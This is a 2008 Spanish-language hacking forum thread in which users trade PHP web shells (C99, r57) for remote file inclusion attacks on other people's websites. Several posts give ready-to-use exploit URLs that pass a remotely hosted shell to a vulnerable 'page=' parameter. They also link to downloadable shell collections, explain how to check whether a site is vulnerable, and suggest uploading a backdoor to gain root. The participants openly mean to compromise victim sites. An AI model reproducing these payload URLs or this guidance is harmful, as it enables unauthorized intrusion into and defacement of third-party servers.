|
Título: shell para rfi Publicado por: Tyrz en 26 Enero 2008, 11:02 am necesito una shell para rfi, me podéis decir si hay alguna web que tenga una o si en hosting gratuitos te deja subirla? Es que no creo q en un hosting gratuito te dejen usar system() o execute()
Gracias ;) Título: Re: shell para rfi Publicado por: -sagitari- en 26 Enero 2008, 15:00 pm C99
http://usuarios.lycos.es/elitehacknet/C99Shell.txt salu2 pd, a la hora de ejecutarlo tienes que pones un "?" al final de txt para que se ejecute y no salga como texto plano.... ej: Código: www.webvictima.com/index.php?page=http://usuarios.lycos.es/elitehacknet/C99Shell.txt? _ Título: Re: shell para rfi Publicado por: Tyrz en 26 Enero 2008, 15:47 pm me sale como texto plano con el ? =S
Título: Re: shell para rfi Publicado por: -sagitari- en 26 Enero 2008, 18:09 pm aquí la tienes en formato gif que te la he subido a un host:
Código: http://www.freewebtown.com/sagitari/c99.gif Si no te funciona prueba de poner el " ? " al final de gif.. salu22 Título: Re: shell para rfi Publicado por: Tyrz en 26 Enero 2008, 20:27 pm No se puede mostrar la imagen “http://www.freewebtown.com/sagitari/c99.gif” porque contiene errores.
Con y sin ? sale eso =S Con algunas sirve y con otras no, xq? Gracias por subirme las shells tio te debo una ;) Título: Re: shell para rfi Publicado por: Tyrz en 26 Enero 2008, 20:53 pm funcionan bien las shell? no me deja ver code ni subir cosas
Título: Re: shell para rfi Publicado por: -sagitari- en 26 Enero 2008, 21:19 pm a ver.. estás seguro de que puedes hacer RFI en la web que estás probando?..
mándame el link "de la web víctima" por mensaje privado.. porque por aquí no puedes dar datos de terceros.. porque a lo mejor la web te estás equivocando, no es vulnerable a rfi y no deja incluir archivos externos.... o la web está en lenguaje asp? porque entonces lógico que no pueda leer shells en php .. salu2 ... pd, soy tía y de nada! Título: Re: shell para rfi Publicado por: BBOYHACK en 27 Enero 2008, 06:25 am buenas amigos tengo el mismo problema intente C99Shell.txt , c99.gif pero nada me sigue abriendo la pagina normal...
segun un scaning que le realize la web es vulnenable ha Linkliste Index.PHP Multiple Remote File Include Vulnerabilities http://www.securityfocus.com/bid/26045/exploit http://webvulnerable/index.php?page=http://usuarios.lycos.es/elitehacknet/c99.gif http://webvulnerable/index.php?page=http://usuarios.lycos.es/elitehacknet/c99.txt? Título: Re: shell para rfi Publicado por: Tyrz en 27 Enero 2008, 10:31 am mándame la web por mp y te miro a ver pero no siempre son vulnerables aun que parezca que si, yo tengo como 10 guardadas que no puedo hacerles nada.
Que valla guay Título: Re: shell para rfi Publicado por: -sagitari- en 27 Enero 2008, 19:34 pm mándame la web por mp y te miro a ver pero no siempre son vulnerables aun que parezca que si, yo tengo como 10 guardadas que no puedo hacerles nada. Que vaya guay es lo que te dije por privado.. hay muchas que al introducir la shell no te deja subir archivos ni modificar porque no tienes permisos de escritura 777 porque no eres root y solamente tienes permisos de lectura.. entonces para poder tener permisos de root tienes que subir un backdoor pero eso no significa que no sea vulnerable solamente resulta un poco más complejo modificar la web.. Citar buenas amigos tengo el mismo problema intente C99Shell.txt , c99.gif pero nada me sigue abriendo la pagina normal... pues no será vulnerable.. prueba: Código: www.webvictima.com/index.php?page=http://google.es si no se te abre la web de google no es vulnerable... y hay veces que el archivo que introduces sí se abre pero de forma ajena al servidor.. por lo tanto no afectaría.... ni sería vulnerable....... salu2 Título: Re: shell para rfi Publicado por: yeikos en 28 Enero 2008, 02:51 am Citar y hay veces que el archivo que introduces sí se abre pero de forma ajena al servidor.. por lo tanto no afectaría.... ni sería vulnerable....... Claro ejemplo de frame/iframe y fopen en caso de PHP... Título: Re: shell para rfi Publicado por: 6666 en 28 Enero 2008, 03:16 am aca te dejo un rar con 66/67 shell no me acuerdo..estan la r57 la c99 entre otras..muy buena colección http://rapidshare.com/files/87180324/todas_las_shell.rar.html (http://rapidshare.com/files/87180324/todas_las_shell.rar.html)
|